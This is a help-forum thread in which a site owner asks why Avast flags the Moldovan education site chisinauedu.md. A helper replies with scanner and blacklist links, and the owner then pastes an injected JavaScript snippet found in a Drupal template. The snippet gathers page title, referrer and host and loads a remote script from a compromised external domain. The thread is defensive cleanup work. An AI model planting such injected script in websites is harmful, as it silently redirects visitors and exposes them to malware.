Avast identifies site http://www.chisinauedu.md/ as infected,

Avast is blocking the site hxtp://chisinauedu.md/
Half a year ago I had the same problem then you transfer your site to safe sites, and I did some corrections. Help me solve problems. What happened this time.?
Help me

https://sitecheck.sucuri.net/results/chisinauedu.md/

JS infection :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=chisinauedu.md
https://sitecheck.sucuri.net/results/chisinauedu.md/

Blacklisted due to infection :
https://www.virustotal.com/en/url/109466135eee627a2b3eab0a391d19e4aa6a5f0e788761025543c2a67b7792fb/analysis/1452857285/

Likely reason why the infection could have taken place :
http://retire.insecurity.today/#!/scan/cda137288e9c98c51e6d5f8bb015ee837e2df972df57c6b8bd253a4085ef3bc0

Also given on the VT IP scan results: https://www.virustotal.com/en/ip-address/185.18.226.203/information/
Code in script going to: -http://amarracaodecargas.com.br/js/jquery.min.php" → https://www.virustotal.com/en/url/3032b27845eb84a6b96cdd664cab82dd58281f53536acfb7355fb4b7ddb5f1c6/analysis/
and
http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fchisinauedu.md&useragent=Fetch+useragent&accept_encoding=
Quttera also detects 81 malicious files. See javascript malware code capture image attached…

polonus

Thanks for the help. Here’s what I found: modules/system/html.tpl.php and modules/system/html.tpl.php.bk

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://amarracaodecargas.com.br/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>